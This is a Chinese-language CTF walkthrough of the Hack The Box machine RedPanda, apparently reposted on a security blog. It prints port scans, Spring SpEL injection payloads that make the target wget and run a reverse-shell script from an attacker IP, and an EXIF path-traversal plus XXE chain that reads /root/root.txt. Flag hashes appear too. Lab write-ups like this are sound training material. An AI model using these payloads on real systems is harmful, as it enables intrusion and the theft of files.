[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入

2025-03-05 14 0

Information Gathering

IP Address Opening Ports
10.10.11.170 TCP:22,8080

$ ip='10.10.11.170'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
8080/tcp open  http-proxy
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sat, 01 Mar 2025 06:18:17 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en" dir="ltr">
|     <head>
|     <meta charset="utf-8">
|     <meta author="wooden_k">
|     <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
|     <link rel="stylesheet" href="https://www.freebuf.com/articles/web/css/panda.css" type="text/css">
|     <link rel="stylesheet" href="https://www.freebuf.com/articles/web/css/main.css" type="text/css">
|     <title>Red Panda Search | Made with Spring Boot</title>
|     </head>
|     <body>
|     <div class='pande'>
|     <div class='ear left'></div>
|     <div class='ear right'></div>
|     <div class='whiskers left'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='whiskers right'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='face'>
|     <div class='eye
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Sat, 01 Mar 2025 06:18:17 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 01 Mar 2025 06:18:18 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
|_http-title: Red Panda Search | Made with Spring Boot
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=3/1%Time=67C2AAC7%P=x86_64-pc-linux-gnu%r(Get
SF:Request,690,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;charset
SF:=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Sat,\x2001\x20Mar\x202
SF:025\x2006:18:17\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html
SF:>\n<html\x20lang=\"en\"\x20dir=\"ltr\">\n\x20\x20<head>\n\x20\x20\x20\x
SF:20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<meta\x20author=\"wooden
SF:_k\">\n\x20\x20\x20\x20<!--Codepen\x20by\x20khr2003:\x20https://codepen
SF:\.io/khr2003/pen/BGZdXw\x20-->\n\x20\x20\x20\x20<link\x20rel=\"styleshe
SF:et\"\x20href=\"css/panda\.css\"\x20type=\"text/css\">\n\x20\x20\x20\x20
SF:<link\x20rel=\"stylesheet\"\x20href=\"css/main\.css\"\x20type=\"text/cs
SF:s\">\n\x20\x20\x20\x20<title>Red\x20Panda\x20Search\x20\|\x20Made\x20wi
SF:th\x20Spring\x20Boot</title>\n\x20\x20</head>\n\x20\x20<body>\n\n\x20\x
SF:20\x20\x20<div\x20class='pande'>\n\x20\x20\x20\x20\x20\x20<div\x20class
SF:='ear\x20left'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='ear\x20ri
SF:ght'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='whiskers\x20left'>\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x20\x2
SF:0\x20\x20<div\x20class='whiskers\x20right'>\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</d
SF:iv>\n\x20\x20\x20\x20\x20\x20<div\x20class='face'>\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<div\x20class='eye")%r(HTTPOptions,75,"HTTP/1\.1\x20200\x2
SF:0\r\nAllow:\x20GET,HEAD,OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Sat
SF:,\x2001\x20Mar\x202025\x2006:18:17\x20GMT\r\nConnection:\x20close\r\n\r
SF:\n")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/h
SF:tml;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\
SF:r\nDate:\x20Sat,\x2001\x20Mar\x202025\x2006:18:18\x20GMT\r\nConnection:
SF:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HT
SF:TP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20
SF:type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,
SF:\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x2
SF:0{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;
SF:}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height
SF::1px;background-color:#525D76;border:none;}</style></head><body><h1>HTT
SF:P\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>
SF:");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSTI

http://10.10.11.170:8080/

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图1

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图2

payload:*{8*8}

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('wget+http://10.10.16.33:9999/rev.sh').getInputStream())}

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('chmod+777+rev.sh').getInputStream())}

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('./rev.sh').getInputStream())}

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图3

User.txt

82505dbb5ab9adee0a0421d9b63840a7

Privilege Escalation:Java RE && XXE

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图4

$ scp -i ./id_rsa woodenk@10.10.11.170:/opt/credit-score/LogParser/final/target/final-1.0-jar-with-dependencies.jar ./

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图5

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图6

该过程解析日志文件,提取/opt/panda_search/redpanda.log访问 JPG 图片的请求信息,读取图片 Artist 属性,并更新并对应 /credits/<Artist>_creds.xml 文件中的访问统计数据。

需要构造Artist属性../来穿越目录,进行XXE。

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图7

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图8

对于/opt/panda_search/redpanda.log文件,当前用户存在于logs组,意味着允许修改

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图9

1.新增属性-Artist在/tmp/exp.jpg

$ exiftool -Artist="/../../../../../../../../../tmp/exp" exp.jpg

-Artist 属性用于设置或获取图片的 “作者” (Artist) 元数据,通常存储在 EXIF 或 XMP 元数据字段中,表示该图片的创建者或所有者。

2.构造/tmp/exp_creds.xml文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY file SYSTEM "/root/root.txt"> ]>
<credits>
 <author>xxx</author>
  <image>
    <uri>/../../../../../../tmp/exp.jpg</uri>
    <views>0</views>
    <data>&ampfile;</data>
  </image>
  <totalviews>0</totalviews>
</credits>

3.注入/opt/panda_search/redpanda.log载荷,触发处理条件

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图10

$ echo "200||test||test||/../../../../../../../../../tmp/exp.jpg" >> /opt/panda_search/redpanda.log

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图11

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入插图12

Root.txt

4f85a578d0e89b0aa9ad4f525fd3213b

相关文章:

  1. [Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升
  2. [Meachines] [Easy] GoodGames SQLI+Flask SSTI+Docker逃逸权限提升
  3. Atlassian Confluence SSTI RCE(CVE-2023-22527)详细漏洞分…
  4. [Meachines] [Easy] Love File Scanner SSRF+Voting System RCE+Win注册表.MSI权限提升
  5. [Meachines] [Easy] Wifinetic FTP匿名登录+Reaver WPS PIN密码泄露权限提升

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评
网络安全
0 0

相关文章

[Meachines] [Easy] Luanne Lua RCE+bozoHTTPd LFI+NetBSD-Dec+doas权限提升
[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升
[Meachines] [Easy] ServMon NVMS-LFI+NSCP(NSClient)权限提升+Chameleon反向shell+reg…
塔塔科技遭勒索攻击,1.4TB数据被泄露
GitHub官方展示如何利用Copilot进行日志安全分析
通过物理渗透测试获取内部网络访问权限:案例分析

发布评论